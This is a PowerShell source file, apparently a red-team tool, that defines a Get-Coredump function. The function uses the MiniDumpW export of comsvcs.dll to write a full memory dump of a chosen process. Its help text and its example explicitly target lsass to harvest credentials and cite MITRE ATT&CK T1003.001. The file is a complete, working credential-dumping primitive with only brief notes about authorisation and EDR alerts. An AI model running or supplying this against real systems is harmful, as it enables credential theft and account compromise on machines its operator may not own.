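function Get-Coredump
{
<#
.SYNOPSIS
Uses comsvcs.dll (COM+ services) to write a memory dump of a running process.
.DESCRIPTION
Calls the MiniDumpW export of comsvcs.dll - the same entry point behind
`rundll32 comsvcs.dll, MiniDump <pid> <path> full` - to write a dump of the
target process to disk.

Operational notes:
- Dumping a system or protected process (e.g. lsass) requires an elevated
  session holding SeDebugPrivilege; the call runs in the caller's context.
- This is the well-known "comsvcs MiniDump" LSASS-dumping primitive
  (MITRE ATT&CK T1003.001). Expect EDR/AV to alert on or block it, and use
  it only on systems you are authorised to test.
- The resulting file contains the target's memory, including any secrets it
  holds (for lsass: credentials). Treat it as sensitive: restrict its ACL,
  move it only over an encrypted channel and delete it when no longer needed.
- MiniDumpW is a rundll32-style entry point and reports no status; success is
  inferred here by checking that the dump file was created.
.PARAMETER DumpPath
Destination file. The parent directory must already exist and the resolved
path must not contain whitespace, because MiniDumpW parses a space-separated
argument string. Relative paths are resolved against the PowerShell current
location. An existing file is never overwritten.
.PARAMETER DumpType
"full" (default) or "mini"; passed through verbatim as the third argument token.
.PARAMETER ProcID
Process ID of the target; it must exist when the function is called.
.EXAMPLE
C:\> $lsass = Get-Process -Name lsass
C:\> Get-Coredump -ProcId $lsass.Id -DumpPath c:\dumps\lsass.dmp
#>
param(
[Parameter(Mandatory = $True)]
[String]$DumpPath,
[Parameter(Mandatory = $False)]
[ValidateSet("full", "mini")]
[String]$DumpType = "full",
[Parameter(Mandatory = $True)]
[int]$ProcID
)
    # Fail early with a clear message instead of a silent "no dump written".
    $null = Get-Process -Id $ProcID -ErrorAction Stop

    # comsvcs.dll resolves relative paths against the process working directory,
    # which is not necessarily the PowerShell current location; make it absolute.
    $fullPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($DumpPath)

    # The argument string handed to MiniDumpW is whitespace-delimited, so a path
    # containing spaces would be split and the dump written somewhere else (or not at all).
    if ($fullPath -match '\s')
    {
        throw "DumpPath must not contain whitespace once resolved: '$fullPath'"
    }

    $parentDir = Split-Path -Parent $fullPath
    if ($parentDir -and -not (Test-Path -LiteralPath $parentDir -PathType Container))
    {
        throw "Directory for DumpPath does not exist: '$parentDir'"
    }

    # Success is detected by the file appearing, so a pre-existing file would
    # make the result ambiguous; also avoids clobbering an earlier dump.
    if (Test-Path -LiteralPath $fullPath -PathType Leaf)
    {
        throw "Refusing to overwrite existing file: '$fullPath'"
    }

    # Compile the P/Invoke stub once per session; Add-Type errors if the type
    # name already exists with a different definition.
    if (-not ('ComSvcs' -as [type]))
    {
        Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class ComSvcs
{
    // rundll32-compatible export:
    //   void CALLBACK MiniDumpW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
    // It returns nothing, so a bool return (as the original stub declared)
    // only ever reflected whatever was left in the return register.
    [DllImport("comsvcs.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern void MiniDumpW(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow);
}
"@
    }

    $lpArg = "{0:d} {1:s} {2:s}" -f $ProcID, $fullPath, $DumpType
    Write-Output "[*] calling comsvcs!MiniDumpW..."
    [ComSvcs]::MiniDumpW([IntPtr]::Zero, [IntPtr]::Zero, $lpArg, 0)

    # Read the last-error value via the marshaler, not a P/Invoked GetLastError():
    # the runtime may overwrite the thread's last error between the two calls.
    $lastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()

    if (Test-Path -LiteralPath $fullPath -PathType Leaf)
    {
        Write-Output "[+] Success, process PID=$($ProcID) dumped as '$($fullPath)'"
    }
    else
    {
        # The last-error value is only a hint here: MiniDumpW does not promise to set it.
        $hint = (New-Object System.ComponentModel.Win32Exception([int]$lastError)).Message
        Write-Error "[-] Failed to dump process PID=$($ProcID): no dump file at '$fullPath' (last Win32 error: $hint)"
    }
}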